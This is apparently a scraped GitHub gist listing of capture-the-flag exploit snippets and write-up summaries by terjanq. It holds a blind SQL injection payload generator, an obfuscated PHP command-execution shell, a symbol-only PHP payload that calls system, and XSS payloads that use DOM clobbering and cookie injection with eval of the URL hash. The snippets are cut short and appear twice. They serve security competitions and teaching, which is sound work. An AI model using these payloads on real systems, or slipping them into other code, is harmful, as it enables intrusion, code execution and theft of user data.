terjanq

## exploit.js
const fetch = require('node-fetch');

var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/'

// Generates definitions for fonts
function generateFonts() {

## rev_shell.php
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

/*
 *   In terminal:
 *       $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
 *   This is how the code will be produced, \xa0\xb8\xba\xab will be
 *   treated as constant therefore no " needed. It is also not copyable
 *   string because of non-ascii characters
 *
 *   Explanation:

## funny.php
/* system(id) */
<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>


<!--
  Explanation:
    - Some of the characters might look like alphanumeric, but they are Unicode characters.
    - 'ArrayΦ' <-> [].Φ
    - 1 <-> ![]
    - 'a' <-> ([].Φ)[![]+![]+![]]

## calc.html
<html>
    <body>
        <script>
            // clobber document.getElementById and make window.calc.contentWindow undefined
            open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

            function start(){
                var ifr = document.createElement('iframe');
                // create sandboxed domain, open challenge page and force its origin to be null
                // null origin makes window.token undefined because of the error when accessing document.cookie

## HTPL-solution.html
<!--
This was a sandboxing challenge where the JS language is presenteded in the form of exotic, made-up language.
It's almost properly sandboxed but there is one bug that players needed to find.
The bug I found was to construct HTML comment (<!--) that is understood by JS and which makes it possible to ignore one semicolon
and then to concat array expression with variable name, like $var$['eval']. To get reference to eval we used DOM clobbering
and defined <iframe name=$win$>
-->

<iframe name=$win$></iframe>
<x-program>

## real-monster.html
<iframe name="xxx"></iframe>
<form method=POST target=xxx action="https://ctftime.pl/login">
    <input name="username" value='<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;'>
    <input name="password" value="123">
</form>


<script>
    (async () =>{
        const sleep = d => new Promise(r=>setTimeout(r,d));

## README.md

      
              3 files
            
          
              1 fork
            
          
              0 comments
            
          
              10 stars
            
          
                terjanq
                / README.md
            
            
              Last active
              July 6, 2022 07:13
            
              
                Postviewer challenge writeup from GoogleCTF 2022
              
          
      View README.md
  
      
    Postviewer - writeup
Challenge's overview

The rumor tells that adm1n stores their secret split into multiple documents.
Can you catch 'em all?
https://postviewer-web.2022.ctfcompetition.com

The challenge consisted of an all client-side simple page, i.e. no backend code was involved. A user can upload any file which will be then locally stored in indexedDB. They can preview their files by either clicking on the title or by visiting file's URL, for example https://postviewer-web.2022.ctfcompetition.com/#file-01d6039e3e157ebcbbf6b2f7cb2dc678f3b9214d. The preview of the file is rendered inside a blob created from data: URL. The rendering occurs by sending file's contents to the iframe via postMessage({ body, mimeType }, '*')
Additionally, there is a /bot endpoint which lets players send URLs to an xss-bot imitating another user. The goal is to steal their documents.

  
## secdriven.md

      
              1 file
            
          
              0 forks
            
          
              4 comments
            
          
              15 stars
            
          
                terjanq
                / secdriven.md
            
            
              Last active
              June 18, 2022 11:58
            
              
                A TL;DR solution to Security Driven by @terjanq

              
      View secdriven.md
  
      
    A TL;DR solution to Security Driven by @terjanq
For this year's Google CTF, I prepared a challenge that is based on a real-world vulnerability. The challenge wasn't solved by any team during the competition so here is the proof that the challenge was in fact solvable! :)

Link to the challenge: https://capturetheflag.withgoogle.com/challenges/web-security-driven
Link to the PoC: https://github.com/google/google-ctf/tree/master/2021/quals/web-security-driven/solution

The goal of the challenge was to send a malicious file to the admin and leak their file with a flag. The ID of the file was embedded into the challenge description (/file?id=133711377731) and only admin had access to it, because the file was private.
Disclamer: The write-up is written on airplane therefore the quality of it is poor, mostly to showcase the required steps to solve the challenge

  
## README.md

      
              2 files
            
          
              3 forks
            
          
              0 comments
            
          
              26 stars
            
          
                terjanq
                / README.md
            
            
              Last active
              October 23, 2021 14:18
            
              
                TokyoWesterns CTF 2020 | writeups by @terjanq

              
      View README.md
  
      
    TokyoWesterns CTF 2020 | writeups by @terjanq
Urlcheck v1 (98 points, 160 solves)
The goal was to bypass WAF protection to access local resources.
app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)

  
## writeup.md

      
              1 file
            
          
              0 forks
            
          
              2 comments
            
          
              1 star
            
          
                terjanq
                / writeup.md
            
            
              Last active
              May 20, 2021 01:43
            
              
                Politer Note - writeup
              
          
      View writeup.md
  
      
    Write-up
Solution
<a id=bad1 href='cid:="</div">'>
<a id=good1 href="cid:></script><iframe srcdoc='$'">

<a id=bad2 href="http://politernotepad.zajebistyc.tf/static/badwords.js">
<a id=good2 href='data:,alert(/greetings from terjanq/)"></script>'>
	const fetch = require('node-fetch');

	var flag = 'nn9ed{'
	var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
	var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
	var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
	const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/'

	// Generates definitions for fonts
	function generateFonts() {
	<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

	/*
	* In terminal:
	* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
	* This is how the code will be produced, \xa0\xb8\xba\xab will be
	* treated as constant therefore no " needed. It is also not copyable
	* string because of non-ascii characters
	*
	* Explanation:
	/* system(id) */
	<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>


	<!--
	Explanation:
	- Some of the characters might look like alphanumeric, but they are Unicode characters.
	- 'ArrayΦ' <-> [].Φ
	- 1 <-> ![]
	- 'a' <-> ([].Φ)[![]+![]+![]]
	<html>
	<body>
	<script>
	// clobber document.getElementById and make window.calc.contentWindow undefined
	open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

	function start(){
	var ifr = document.createElement('iframe');
	// create sandboxed domain, open challenge page and force its origin to be null
	// null origin makes window.token undefined because of the error when accessing document.cookie
	<!--
	This was a sandboxing challenge where the JS language is presenteded in the form of exotic, made-up language.
	It's almost properly sandboxed but there is one bug that players needed to find.
	The bug I found was to construct HTML comment (<!--) that is understood by JS and which makes it possible to ignore one semicolon
	and then to concat array expression with variable name, like $var$['eval']. To get reference to eval we used DOM clobbering
	and defined <iframe name=$win$>
	-->

	<iframe name=$win$></iframe>
	<x-program>
	<iframe name="xxx"></iframe>
	<form method=POST target=xxx action="https://ctftime.pl/login">
	<input name="username" value='<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;'>
	<input name="password" value="123">
	</form>


	<script>
	(async () =>{
	const sleep = d => new Promise(r=>setTimeout(r,d));